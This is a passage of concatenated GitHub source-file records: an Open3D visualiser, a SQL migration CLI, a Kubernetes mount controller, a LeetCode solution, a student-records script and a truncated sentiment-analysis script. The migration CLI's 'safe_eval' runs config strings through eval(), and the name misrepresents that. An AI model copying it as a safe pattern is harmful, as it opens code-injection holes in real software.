np.array(itemgetter(*SEMANTIC_NAMES[label_pred])(CLASS_COLOR))\n rgb = label_pred_rgb\n\n offset_file = os.path.join(opt.prediction_path, opt.data_split, 'coords_offsets', opt.room_name + '.npy')\n assert os.path.isfile(offset_file), 
'No offset result - {}.'.format(offset_file)\n offset_coords = np.load(offset_file)\n xyz = offset_coords[:, :3] + offset_coords[:, 3:]\n\n # same color order according to instance pointnum\n elif (opt.task == 'instance_gt'):\n assert opt.data_split != 'test'\n inst_label = inst_label.astype(np.int)\n print(\"Instance number: {}\".format(inst_label.max() + 1))\n inst_label_rgb = np.zeros(rgb.shape)\n object_idx = (inst_label >= 0)\n ins_num = inst_label.max() + 1\n ins_pointnum = np.zeros(ins_num)\n for _ins_id in range(ins_num):\n ins_pointnum[_ins_id] = (inst_label == _ins_id).sum()\n sort_idx = np.argsort(ins_pointnum)[::-1]\n for _sort_id in range(ins_num):\n inst_label_rgb[inst_label == sort_idx[_sort_id] ] = COLOR_DETECTRON2[_sort_id % len(COLOR_DETECTRON2)]\n rgb = inst_label_rgb\n\n # same color order according to instance pointnum\n elif (opt.task == 'instance_pred'):\n assert opt.data_split != 'train'\n instance_file = os.path.join(opt.prediction_path, opt.data_split, opt.room_name + '.txt')\n assert os.path.isfile(instance_file), 'No instance result - {}.'.format(instance_file)\n f = open(instance_file, 'r')\n masks = f.readlines()\n masks = [mask.rstrip().split() for mask in masks]\n inst_label_pred_rgb = np.zeros(rgb.shape) # np.ones(rgb.shape) * 255 #\n\n ins_num = len(masks)\n ins_pointnum = np.zeros(ins_num)\n inst_label = -100 * np.ones(rgb.shape[0]).astype(np.int)\n\n for i in range(len(masks) - 1, -1, -1):\n mask_path = os.path.join(opt.prediction_path, opt.data_split, masks[i][0])\n assert os.path.isfile(mask_path), mask_path\n if (float(masks[i][2]) < 0.09):\n continue\n mask = np.loadtxt(mask_path).astype(np.int)\n print('{} {}: {} pointnum: {}'.format(i, masks[i], SEMANTIC_IDX2NAME[int(masks[i][1])], mask.sum())) \n ins_pointnum[i] = mask.sum()\n inst_label[mask == 1] = i \n sort_idx = np.argsort(ins_pointnum)[::-1]\n for _sort_id in range(ins_num):\n inst_label_pred_rgb[inst_label == sort_idx[_sort_id] ] = COLOR_DETECTRON2[_sort_id % len(COLOR_DETECTRON2)]\n rgb = inst_label_pred_rgb\n\n\n if opt.data_split != 'test':\n sem_valid = (label != -100)\n xyz = xyz[sem_valid]\n rgb = rgb[sem_valid]\n\n return xyz, rgb\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_path', help='path to the dataset files')\n parser.add_argument('--prediction_path', help='path to the prediction results')\n parser.add_argument('--data_split', help='train / val / test', default='val')\n parser.add_argument('--room_name', help='room_name', default='scene0146_01')\n parser.add_argument('--task', help='input / semantic_gt / semantic_pred / offset_semantic_pred / instance_gt / instance_pred', default='input')\n opt = parser.parse_args()\n\n\n\n xyz, rgb = get_coords_color(opt)\n points = xyz[:, :3]\n colors = rgb / 255\n\n pc = o3d.geometry.PointCloud()\n pc.points = o3d.utility.Vector3dVector(points)\n pc.colors = o3d.utility.Vector3dVector(colors)\n\n vis = o3d.visualization.Visualizer()\n vis.create_window()\n vis.add_geometry(pc)\n vis.get_render_option().point_size = 1.5\n vis.run()\n vis.destroy_window()\n\n \n\n\n\n\n\n\n","repo_name":"hustvl/HAIS","sub_path":"visualize_open3d.py","file_name":"visualize_open3d.py","file_ext":"py","file_size_in_byte":8958,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"37"} +{"seq_id":"11750386349","text":"import argparse\nimport importlib\nimport os\nimport sys\nimport logging\nfrom typing import Any, Dict, Iterable\n\nimport toml\n\nfrom 
sqldb_migration_ensurer.IDatabaseConnector import IDatabaseConnector\nfrom sqldb_migration_ensurer.IMigrationEngine import IMigrationEngine\nfrom sqldb_migration_ensurer.StandardMigrationEngine import StandardMigrationEngine\n\n\ndef parse_options(args):\n\n parser = argparse.ArgumentParser(\n prog=\"sqldb-migration-ensurer\",\n description=\"\"\"\n A SQL-like DB migration tool that acts using a declarative language rather than an imperative one.\n Imperative commands are supported as well though.\n \"\"\"\n )\n\n parser.add_argument(\"-c\", \"--configuration_file\", type=str, required=True, default=\"migration.toml\", help=\"\"\"\n The configuration file used to retrieve \n \"\"\")\n parser.add_argument(\"-l\", \"--log_level\", type=str, required=True, default=\"INFO\", help=\"\"\"\n the log level we wuill use to log\n \"\"\")\n\n return parser.parse_args(args)\n\n\ndef read_configuration(path: str):\n with open(path, encoding=\"utf-8\", mode=\"r\") as f:\n content = f.read()\n return toml.loads(content)\n\n\ndef get_engine(config: Dict[str, Any]):\n \"\"\"\n Generate migration engine\n :param config:\n :return:\n \"\"\"\n engine_name = str(config[\"engine\"])\n if engine_name == \"standard\":\n logging.info(f\"generating instance StandardMigrationEngine...\")\n result = StandardMigrationEngine()\n else:\n raise ValueError(f\"Invalid engine name {engine_name}\")\n\n return result\n\n\ndef load_database_connector(module_name: str, class_name: str) -> \"IDatabaseConnector\":\n \"\"\"\n\n :param module_name:\n :param class_name:\n :return:\n :see: https://stackoverflow.com/a/19228066\n \"\"\"\n # module_name: my_package._my_module\"\n # classname: MyClass\n logging.info(f\"Loading module {module_name}...\")\n module = importlib.import_module(module_name)\n logging.info(f\"Loading class {class_name} from module {module.__name__}...\")\n connector_class = getattr(module, class_name)\n return connector_class()\n\n\ndef set_database_connector(engine: IMigrationEngine, config: Dict[str, Any]):\n connector_module_name = str(config[\"connector\"][\"module\"])\n connector_class_name = str(config[\"connector\"][\"class\"])\n engine.set_database_connector(load_database_connector(connector_module_name, connector_class_name))\n\n\ndef get_migration_files(config: Dict[str, Any]) -> Iterable[str]:\n if \"directory\" in config:\n yield from get_migration_files_by_directory(\n path=str(config[\"directory\"][\"path\"]),\n consider_files_that=str(config[\"directory\"][\"consider_files_that\"])\n )\n else:\n raise ValueError(f\"invalid files statements in config. 
Allowed types are 'directory'\")\n\n\ndef safe_eval(expr: str) -> Any:\n env = {}\n return eval(expr, env, env)\n\n\ndef get_migration_files_by_directory(path: str, consider_files_that: str) -> Iterable[str]:\n function = safe_eval(consider_files_that)\n for folder, directories_in_folder, files_in_folder in os.walk(path):\n for x in files_in_folder:\n p = os.path.abspath(os.path.join(folder, x))\n if function(p):\n logging.info(f\"Consider migration file {p}\")\n yield p\n\n\ndef main():\n options = parse_options(sys.argv[1:])\n\n # set the log level\n logging.basicConfig(\n level=options.log_level\n )\n # read config\n config = read_configuration(os.path.abspath(os.path.join(options.configuration_file)))\n # generate engine\n engine = get_engine(config[\"engine\"])\n # set target\n engine.set_target(str(config[\"engine\"][\"target\"]))\n # set migration files\n engine.set_migration_files(get_migration_files(\n config=config[\"files\"]\n ))\n # set database connector\n set_database_connector(\n engine=engine,\n config=config[\"database\"],\n )\n # set database parameters\n engine.set_database_involved_parameters(\n parameters=config[\"database\"][\"parameters\"]\n )\n # configuration completed! Now let's run the migration tool\n engine.migrate()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Koldar/curly-carnival","sub_path":"sqldb_migration_ensurer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4066511542","text":"import os\nimport sys\nimport logging\nfrom collections import defaultdict\nimport kopf\n\nimport digi.util as util\nfrom digi.util import parse_gvr, spaced_name, parse_spaced_name\n\n\"\"\"\nAn embedded meta-actor that implements the mount semantics.\n\nEvent watch:\n- Watch the parent model and identify the child models;\n- Watch the child models;\n\nEvent propagation:\n- On child's updates (intent and status): propagate to the child's \n copy in the parent;\n- On parent's updates (intent) on the child's copy: propagate to \n the child's intent;\n\"\"\"\n\n_mount_mode = os.environ.get(\"MOUNT_MODE\", \"permissive\")\nTRIM_FROM_PARENT, TRIM_FROM_CHILD = set(), set() # don't trim any\nif _mount_mode == \"strict\":\n TRIM_FROM_PARENT = {\"status\", \"output\", \"obs\", \"meta\"}\n TRIM_FROM_CHILD = {\"intent\", \"input\"}\nelif _mount_mode == \"intent_rec\":\n TRIM_FROM_CHILD = set()\n\nclass Watch:\n def __init__(self, g, v, r, n, ns=\"default\", *,\n create_fn=None,\n resume_fn=None,\n update_fn=None,\n # TBD enable finalizer but avoid looping with multiple children\n delete_fn=None, delete_optional=True,\n field_fn=None, field=\"\",\n log_level=logging.INFO):\n self._registry = util.KopfRegistry()\n self._log_level = log_level\n _args = (g, v, r)\n _kwargs = {\n \"registry\": self._registry,\n # watch a specific model only\n \"when\": lambda name, namespace, **_: name == n and namespace == ns,\n }\n\n @kopf.on.startup(registry=self._registry)\n def configure(settings: kopf.OperatorSettings, **_):\n settings.persistence.progress_storage = kopf.AnnotationsProgressStorage()\n settings.posting.level = log_level\n\n if create_fn is not None:\n kopf.on.create(*_args, **_kwargs)(create_fn)\n if resume_fn is not None:\n kopf.on.resume(*_args, **_kwargs)(resume_fn)\n if update_fn is not None:\n kopf.on.update(*_args, **_kwargs)(update_fn)\n if delete_fn is not None:\n kopf.on.delete(*_args, **_kwargs, optional=delete_optional)(delete_fn)\n 
if field_fn is not None and field != \"\":\n kopf.on.field(field=field, *_args, **_kwargs)(field_fn)\n assert create_fn or resume_fn or update_fn or delete_fn, \"no handler provided\"\n\n self._ready_flag, self._stop_flag = None, None\n\n def start(self):\n self._ready_flag, self._stop_flag = util.run_operator(\n self._registry, log_level=self._log_level,\n skip_log_setup=True,\n )\n return self\n\n def stop(self):\n assert self._stop_flag, \"watch has not started\"\n self._stop_flag.set()\n return self\n\n\nclass Mounter:\n \"\"\"Implements the mount semantics for a given (parent) digivice\"\"\"\n\n def __init__(self, g, v, r, n, ns=\"default\",\n log_level=logging.INFO):\n\n \"\"\" children event handlers \"\"\"\n\n def on_child_create(body, meta, name, *args, **kwargs):\n _g, _v, _r = util.gvr_from_body(body)\n self._logger.info(f\"on create child {name} gen {meta['generation']}\")\n _sync_from_parent(_g, _v, _r, meta=meta, name=name,\n attrs_to_trim=TRIM_FROM_PARENT,\n *args, **kwargs)\n _sync_to_parent(_g, _v, _r, meta=meta, name=name,\n attrs_to_trim=TRIM_FROM_CHILD,\n *args, **kwargs)\n\n def on_child_update(body, meta, name, namespace,\n *args, **kwargs):\n _g, _v, _r = util.gvr_from_body(body)\n _id = util.model_id(_g, _v, _r, name, namespace)\n\n self._logger.info(f\"on child {name} gen {meta['generation']}\")\n if meta[\"generation\"] == self._children_skip_gen.get(_id, -1):\n self._logger.info(f\"skipped child {name} gen {meta['generation']}\")\n return\n\n return _sync_to_parent(_g, _v, _r, name, namespace, meta,\n *args, **kwargs)\n\n def on_child_delete(body, name, namespace,\n *args, **kwargs):\n _, _ = args, kwargs\n\n _g, _v, _r = util.gvr_from_body(body)\n\n # remove watch\n gvr_str = util.gvr(_g, _v, _r)\n nsn_str = util.spaced_name(name, namespace)\n\n w = self._children_watches.get(gvr_str, {}).get(nsn_str, None)\n if w is not None:\n w.stop()\n self._children_watches[gvr_str].pop(nsn_str, \"\")\n\n # will delete from parent\n _sync_to_parent(_g, _v, _r, name, namespace, spec=None,\n *args, **kwargs)\n\n def _sync_from_parent(group, version, plural, name, namespace, meta,\n attrs_to_trim=None, *args, **kwargs):\n _, _ = args, kwargs\n\n parent, prv, pgn = util.get_spec(g, v, r, n, ns)\n\n # check if child exists\n mounts = parent.get(\"mount\", {})\n gvr_str = util.gvr(group, version, plural)\n nsn_str = util.spaced_name(name, namespace)\n\n if (gvr_str not in mounts or\n (nsn_str not in mounts[gvr_str] and\n name not in mounts[gvr_str])):\n self._logger.warning(f\"unable to find the {nsn_str} or {name} in the {parent}\")\n return\n\n models = mounts[gvr_str]\n n_ = name if name in models else nsn_str\n\n patch = models[n_]\n if attrs_to_trim is not None:\n patch = util.trim_attr(patch, attrs_to_trim)\n\n _, resp, e = util.check_gen_and_patch_spec(\n group, version, plural,\n name, namespace,\n patch, gen=meta[\"generation\"]\n )\n\n if e is not None:\n self._logger.warning(f\"unable to sync from parent to {name} due to {e}\")\n else:\n model_id = util.model_id(group, version, plural,\n name, namespace)\n new_gen = resp[\"metadata\"][\"generation\"]\n self._children_gen[model_id] = new_gen\n if meta[\"generation\"] + 1 == new_gen:\n self._children_skip_gen[model_id] = new_gen\n\n def _sync_to_parent(group, version, plural, name, namespace, meta,\n spec, diff, attrs_to_trim=None, *args, **kwargs):\n _, _ = args, kwargs\n\n # propagation from child retries until succeed\n while True:\n parent, prv, pgn = util.get_spec(g, v, r, n, ns)\n\n # check if child exists\n mounts 
= parent.get(\"mount\", {})\n gvr_str = util.gvr(group, version, plural)\n nsn_str = util.spaced_name(name, namespace)\n\n if (gvr_str not in mounts or\n (nsn_str not in mounts[gvr_str] and\n name not in mounts[gvr_str])):\n self._logger.warning(f\"unable to find the {nsn_str} or {name} in the {parent}\")\n return\n\n models = mounts[gvr_str]\n n_ = name if name in models else nsn_str\n\n if spec is None:\n parent_patch = None # will convert to json null\n else:\n if models[n_].get(\"mode\", \"hide\") == \"hide\":\n if attrs_to_trim is None:\n attrs_to_trim = set()\n attrs_to_trim.add(\"mount\")\n\n # TBD rename to _gen_parent_spec\n parent_patch = _gen_parent_patch(spec, diff, attrs_to_trim)\n\n # add roots\n if parent_patch is None:\n # only child\n if len(mounts[gvr_str]) == 1:\n parent_patch = {\n \"mount\": {\n gvr_str: None\n }\n }\n else:\n parent_patch = {\n \"mount\": {\n gvr_str: {\n n_: None\n }\n }\n }\n else:\n parent_patch = {\n \"mount\": {\n gvr_str: {\n n_: {\n \"spec\": parent_patch,\n \"generation\": meta[\"generation\"],\n }\n }\n }}\n\n # maybe rejected if parent has been updated;\n # continue to try until succeed\n resp, e = util.patch_spec(g, v, r, n, ns, parent_patch, rv=prv)\n if e is not None:\n if e.status == 409:\n self._logger.warning(f\"unable to sync to parent from {name} due to conflict; retry\")\n else:\n self._logger.error(f\"failed to sync {name} to parent due to {e}; abort\")\n return\n else:\n new_gen = resp[\"metadata\"][\"generation\"]\n self._logger.info(f\"update child {name} generation to {meta['generation']}\")\n if pgn + 1 == new_gen:\n self._parent_skip_gen = new_gen\n break\n\n def _gen_parent_patch(child_spec, diff, attrs_to_trim=None):\n child_spec = dict(child_spec)\n\n if diff is not None:\n child_spec = util.apply_diff({\"spec\": child_spec}, diff)[\"spec\"]\n\n if attrs_to_trim is not None:\n child_spec = util.trim_attr(child_spec, attrs_to_trim)\n\n return child_spec\n\n \"\"\" parent event handlers \"\"\"\n\n def on_parent_create(spec, diff, *args, **kwargs):\n _, _ = args, kwargs\n _update_children_watches(spec.get(\"mount\", {}))\n _sync_to_children(spec, diff)\n\n def on_mount_attr_update(spec, meta, diff, *args, **kwargs):\n _, _ = args, kwargs\n\n if meta[\"generation\"] == self._parent_skip_gen:\n self._logger.info(f\"skipped parent gen {self._parent_skip_gen}\")\n return\n\n mounts = spec.get(\"mount\", {})\n\n _update_children_watches(mounts)\n _sync_to_children(spec, diff)\n _prune_mounts(mounts, meta)\n\n def on_parent_delete(*args, **kwargs):\n _, _ = args, kwargs\n self.stop()\n\n def _prune_mounts(mounts, meta):\n rv = meta[\"resourceVersion\"]\n while True:\n to_prune = list()\n for gvr_str, models in mounts.items():\n if len(models) == 0:\n to_prune.append(gvr_str)\n if len(to_prune) == 0:\n return\n patch = {\n \"mounts\": {\n gvr_str: None for gvr_str in to_prune\n }\n }\n _, e = util.patch_spec(g, v, r, n, ns, patch, rv=rv)\n if e is None:\n self._logger.info(f\"prune mount: {patch}\")\n return\n elif e.status != 409:\n self._logger.warning(f\"prune mount failed due to {e}\")\n return\n\n self._logger.info(f\"prune mount will retry due to: {e}\")\n spec, rv, _ = util.get_spec(g, v, r, n, ns)\n mounts = spec.get(\"mount\", {})\n\n def _update_children_watches(mounts: dict):\n # iterate over mounts and add/trim child event watches\n # add watches\n for gvr_str, models in mounts.items():\n gvr = parse_gvr(gvr_str) # child's gvr\n\n for nsn_str, m in models.items():\n nsn = parse_spaced_name(nsn_str)\n # in case default ns 
is omitted in the model\n nsn_str = spaced_name(*nsn)\n\n if gvr_str in self._children_watches and \\\n nsn_str in self._children_watches[gvr_str]:\n continue\n\n # TBD: add child event handlers\n self._logger.info(f\"new watch for child {nsn_str}\")\n self._children_watches[gvr_str][nsn_str] \\\n = Watch(*gvr, *nsn,\n create_fn=on_child_create,\n resume_fn=on_child_create,\n update_fn=on_child_update,\n delete_fn=on_child_delete,\n log_level=log_level).start()\n\n # trim watches no longer needed\n for gvr_str, model_watches in self._children_watches.items():\n mw_to_delete = set()\n for nsn_str, w in model_watches.items():\n models = mounts.get(gvr_str, {})\n if nsn_str not in models and \\\n util.trim_default_space(nsn_str) not in models:\n w.stop()\n mw_to_delete.add(nsn_str)\n\n for d in mw_to_delete:\n model_watches.pop(d, None)\n\n def _gen_child_patch(parent_spec, gvr_str, nsn_str):\n mount_entry = parent_spec \\\n .get(\"mount\", {}) \\\n .get(gvr_str, {}) \\\n .get(nsn_str, {})\n if mount_entry.get(\"mode\", \"hide\") == \"hide\":\n mount_entry.get(\"spec\", {}).pop(\"mount\", {})\n\n if mount_entry.get(\"status\", \"inactive\") == \"active\":\n spec = mount_entry.get(\"spec\", None)\n if spec is not None:\n spec = util.trim_attr(spec, TRIM_FROM_PARENT)\n\n gen = mount_entry.get(\"generation\", sys.maxsize)\n return spec, gen\n\n return None, None\n\n def _sync_to_children(parent_spec, diff):\n # sort the diff by the attribute path (in tuple)\n diff = sorted(diff, key=lambda x: x[1])\n\n # filter to only the intent/input updates\n to_sync = dict()\n for _, f, _, _ in diff:\n # skip non children update\n if len(f) < 3:\n continue\n\n gvr_str, nsn_str = f[0], f[1]\n model_id = util.model_id(*parse_gvr(gvr_str),\n *parse_spaced_name(nsn_str))\n\n if model_id not in to_sync:\n cs, gen = _gen_child_patch(parent_spec, gvr_str, nsn_str)\n if cs is not None:\n to_sync[model_id] = cs, gen\n\n # sync all, e.g., on parent resume and creation\n if len(diff) == 0:\n for gvr_str, ms in parent_spec.get(\"mount\", {}).items():\n for nsn_str, m in ms.items():\n model_id = util.model_id(*parse_gvr(gvr_str),\n *parse_spaced_name(nsn_str))\n cs, gen = _gen_child_patch(parent_spec, gvr_str, nsn_str)\n # both rv and gen can be none as during the initial sync\n # the parent may overwrite\n if cs is not None:\n to_sync[model_id] = cs, gen\n\n # push to children models\n # TBD: transactional update\n for model_id, (cs, gen) in to_sync.items():\n cur_gen, resp, e = util.check_gen_and_patch_spec(\n *util.parse_model_id(model_id),\n spec=cs,\n gen=max(gen, self._children_gen.get(model_id, -1)))\n if e is not None:\n self._logger.warning(f\"unable to sync to child {model_id} due to {e}\")\n else:\n new_gen = resp[\"metadata\"][\"generation\"]\n self._children_gen[model_id] = new_gen\n if cur_gen + 1 == new_gen:\n self._children_skip_gen[model_id] = new_gen\n\n # subscribe to the events of the parent model\n self._parent_watch = Watch(g, v, r, n, ns,\n create_fn=on_parent_create,\n resume_fn=on_parent_create,\n field_fn=on_mount_attr_update, field=\"spec.mount\",\n delete_fn=on_parent_delete, delete_optional=True,\n log_level=log_level)\n\n # subscribe to the events of the child models;\n # keyed by the gvr and then spaced name\n self._children_watches = defaultdict(dict)\n\n # last handled generation of a child, keyed by model_id;\n # used when update the children because the parent's copy\n # might be out of date\n self._children_gen = dict()\n\n # used to filter last self-write on the child\n 
self._children_skip_gen = dict()\n        self._parent_skip_gen = -1\n\n        # mounter logging\n        self._logger = logging.getLogger(__name__)\n        self._logger.setLevel(log_level)\n\n    def start(self):\n        self._parent_watch.start()\n        self._logger.info("started the mounter")\n\n    def stop(self):\n        self._parent_watch.stop()\n        for _, mws in self._children_watches.items():\n            for _, w in mws.items():\n                w.stop()\n        return self\n\n\ndef test():\n    gvr = (\"mock.digi.dev\", \"v1\", \"samples\")\n    Mounter(*gvr, n=\"sample\").start()\n\n\nif __name__ == '__main__':\n    test()\n","repo_name":"digi-project/digi","sub_path":"driver/digi/mount.py","file_name":"mount.py","file_ext":"py","file_size_in_byte":17899,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"}
{"seq_id":"33760515018","text":"# -*- coding: utf-8 -*-\n\"\"\"\n    @Time    : 2020/6/24 22:25\n    @Author  : QDY\n    @FileName: 77. 组合_DFS.py\n\n    Given two integers n and k, return all possible combinations of k numbers chosen from 1 ... n.\n\n    Example:\n    Input: n = 4, k = 2\n    Output:\n    [\n    [2,4],\n    [3,4],\n    [2,3],\n    [1,2],\n    [1,3],\n    [1,4],\n    ]\n\n\"\"\"\nclass Solution:\n    def combine(self, n, k):\n        res = []\n        if not n or not k or n<k:return res\n\n        def dfs(cur,nums):\n            len_n = len(nums)\n            if len_n==k:\n                nonlocal res\n                res.append(nums)\n            else:\n                for j in range(cur+1,n-k+len_n+2): # pruning: stop where too few numbers remain to reach k\n                    dfs(j,nums+[j])\n\n        for i in range(1,n-k+2):\n            dfs(i,[i])\n\n        return res","repo_name":"QDylan/Learning-","sub_path":"Leetcode/77. 组合_DFS.py","file_name":"77. 组合_DFS.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"17748440746","text":"class Student:\r\n    def __init__(self, roll, name, m1, m2):\r\n        self.roll = roll\r\n        self.name = name\r\n        self.m1 = m1\r\n        self.m2 = m2\r\n\r\n    def accept(self, roll, name, m1, m2):\r\n        ob = Student(roll, name, m1, m2)\r\n        l.append(ob)\r\n\r\n    def display(self, ob):\r\n        print(\"RollNo : \", ob.roll)\r\n        print(\"Name : \", ob.name)\r\n        print(\"Marks1 : \", ob.m1)\r\n        print(\"Marks2 : \", ob.m2)\r\n        print()\r\n\r\n    def search(self, roll):\r\n        for i in range(len(l)):\r\n            if l[i].roll == roll:\r\n                return i\r\n        return -1\r\n\r\n    def update(self, roll, no):\r\n        for i in range(len(l)):\r\n            if l[i].roll == roll:\r\n                l[i].roll = no\r\n\r\n    def delete(self, roll):\r\n        for i in range(len(l)):\r\n            if l[i].roll == roll:\r\n                del l[i]\r\n\r\nl = []\r\nob = Student(0, \"\", 0, 0)\r\nprint(\"Operations available are :\")\r\nprint(\"1. Accept Student details \\n2. Display Student details \\n3. Search Student details \\n4. Update Student details \\n5. Delete Student details\")\r\nob.accept(124, \"Puneeth\", 98, 100)\r\nob.accept(113, \"Aarya\", 98, 99)\r\nob.accept(120, \"Prithviraj\", 99, 98)\r\nch = int(input(\"Enter your choice : \"))\r\nif ch == 1:\r\n    print(\"Enter Student details\")\r\n    roll = int(input())\r\n    name = input()\r\n    m1 = int(input())\r\n    m2 = int(input())\r\n    ob.accept(roll, name, m1, m2)\r\nelif ch == 2:\r\n    a = int(input(\"Enter the roll no of student : \"))\r\n    if ob.search(a) != -1:\r\n        ob.display(l[ob.search(a)])\r\n    else:\r\n        print(\"Data not found\")\r\nelif ch == 3:\r\n    a = int(input(\"Enter the roll no of student : \"))\r\n    if ob.search(a) != -1:\r\n        print(\"Data is Available in the database\")\r\n    else:\r\n        print(\"Data not found\")\r\nelif ch == 4:\r\n    a = int(input(\"Enter the roll no of student : \"))\r\n    b = int(input(\"Enter the rollno to be updated\"))\r\n    if ob.search(a) != -1:\r\n        ob.update(a, b)\r\n    else:\r\n        print(\"Data not found\")\r\nelse:\r\n    a = int(input(\"Enter the roll no of student : \"))\r\n    if ob.search(a) != -1:\r\n        ob.delete(a)\r\n        print(\"Deleted successfully\")\r\n    else:\r\n        print(\"Data not found\")\r\n    \r\n    \r\n\r\n","repo_name":"Pankaj2107/BDA-LAB","sub_path":"student_management.py","file_name":"student_management.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"74530351147","text":"import re\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom twitter import *\r\n# Tweepy - Python library for accessing the Twitter API.\r\nimport tweepy\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom wordcloud import WordCloud\r\n\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem.porter import PorterStemmer\r\n\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.naive_bayes import BernoulliNB\r\n#from sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.calibration import CalibratedClassifierCV\r\nimport time\r\n\r\n#nltk.download('stopwords')\r\n#all_stopwords = stopwords.words('english')\r\n \r\n#loading data=============================================================================\r\n\r\ndataset_columns = [\"sentiment\" , \"id\" , \"time\" , \"flag\" , \"user\" , \"text\" ]\r\ndataset_coding = \"ISO-8859-1\"\r\ndataset = pd.read_csv(\"twitter_dataset.csv\", names = dataset_columns , encoding = dataset_coding )\r\n\r\n#preprocessing function=============================================================================\r\n\r\ndef preprocess(tweet , stem = True):\r\n    processedText = []\r\n    \r\n    urlPattern = r\"((http://)[^ ]*|(https://)[^ ]*|( www\\.)[^ ]*)\"\r\n    userPattern = '@[^\\s]+'\r\n    alphanumericPattern = r'\\w*\\d\\w*'\r\n    sequencePattern = r\"(.)\\1\\1+\"\r\n    seqReplacePattern = r\"\\1\\1\"\r\n    punc = r'[^\\w\\s]'\r\n    \r\n    #tweet = tweet.lower()\r\n    tweet = re.sub(urlPattern , '' , tweet)\r\n    tweet = re.sub(userPattern , '' , tweet)\r\n    tweet = re.sub(alphanumericPattern , '' , tweet)\r\n    tweet = re.sub(sequencePattern , seqReplacePattern , tweet)\r\n    tweet = re.sub(punc,\"\",tweet)\r\n    \r\n    tweet = tweet.split() \r\n    ps = PorterStemmer()\r\n    \r\n    all_stopwords = stopwords.words('english')\r\n    \r\n    \r\n    for word in 
tweet:\r\n if word not in (all_stopwords):\r\n if stem:\r\n processedText.append(ps.stem(word))\r\n else:\r\n processedText.append(word)\r\n \r\n return \" \".join(processedText)\r\n \r\n \r\n#droping 600000 data------------------------------------------------------------------\r\n\r\ncleared_dataset = dataset.sample(frac=1).reset_index(drop=True)\r\ncleared_dataset = cleared_dataset.iloc[0:1000000]\r\n\r\n#appling preprocessing=============================================================================\r\n\r\ncleared_dataset = cleared_dataset.drop(cleared_dataset.index[0]).reset_index()\r\ncleared_dataset = cleared_dataset.drop(['time','flag','user','id','index'],axis=1)\r\ncleared_dataset[\"text\"] = cleared_dataset[\"text\"].apply(preprocess)\r\nX = cleared_dataset['text']\r\n\r\n\r\n#splitting data---------------------------------------------------------------------------------\r\n\r\ny = cleared_dataset['sentiment']\r\nX_train, X_test, y_train, y_test = train_test_split(X , y, test_size = 0.30, random_state = 10)\r\n\r\n#vectorizing data\r\n\r\nvectorizer = TfidfVectorizer(analyzer='word',max_df=0.90, min_df=2, max_features = 500000,ngram_range=(1,2))\r\nX_train = vectorizer.fit_transform(X_train)\r\ntfidf_tokens = vectorizer.get_feature_names()\r\nprint(\"Number of feature_words = \", len(tfidf_tokens))\r\n#print(tfidf_tokens[1:2000])\r\n\r\nX_test = vectorizer.transform(X_test) #transforming x_test on X_train's transformation\r\n\r\n#scaling\r\n\r\nx_max = X_train.max()\r\nx_min = X_train.min()\r\n\r\nX_train = (X_train - x_min)/x_max\r\nX_test = (X_test - x_min)/x_max\r\n\r\n#model evaluation=============================================================================\r\n\r\ndef model(model):\r\n y_pred = model.predict(X_test)\r\n y_pred = pd.Series(y_pred)\r\n y_pred = y_pred.values \r\n y_test_ = pd.Series(y_test) \r\n y_test_ = y_test_.values \r\n #print(\"Comparison:\")\r\n #result = np.concatenate((y_pred.reshape(len(y_pred),1), y_test_.reshape(len(y_test_),1)),1)\r\n #print(result[1:500])\r\n \r\n c_matrix = confusion_matrix(y_test_, y_pred)\r\n print(\"Confusion Matrix = \\n\",c_matrix)\r\n print(\"Accuracy Score = \",accuracy_score(y_test_, y_pred))\r\n print(\"Train Score = \",model.score(X_train, y_train))\r\n print(\"Test Score = \",model.score(X_test, y_test))\r\n \r\n \r\n \r\n categories = ['Negative','Positive']\r\n prediction = ['True Negative','False Positive', 'False Negative','True Positive']\r\n percentage = ['{0:.2%}'.format(value) for value in c_matrix.flatten() / np.sum(c_matrix)]\r\n\r\n labels = [f'{m}\\n{n}' for m, n in zip(prediction,percentage)]\r\n labels = np.asarray(labels).reshape(2,2)\r\n sns.heatmap(c_matrix,cmap = 'Blues' , fmt = '',annot = labels, xticklabels = categories, yticklabels = categories)\r\n plt.xlabel(\"Predicted values\")\r\n plt.ylabel(\"Actual values\")\r\n plt.title (\"Confusion Matrix\")\r\n \r\ndef logisticRegression():\r\n global logistic_reg\r\n start_time = time.time()\r\n logistic_reg = LogisticRegression(solver = 'sag',C = 2, max_iter = 1500)\r\n logistic_reg.fit(X_train, y_train) \r\n model(logistic_reg)\r\n print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n \r\n \r\ndef naiveBayes(): \r\n global naive_bayes \r\n start_time = time.time()\r\n naive_bayes = BernoulliNB()\r\n naive_bayes.fit(X_train, y_train) \r\n model(naive_bayes)\r\n print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n \r\ndef svm():\r\n global svm_model\r\n svm = LinearSVC()\r\n svm_model = CalibratedClassifierCV(svm) \r\n 
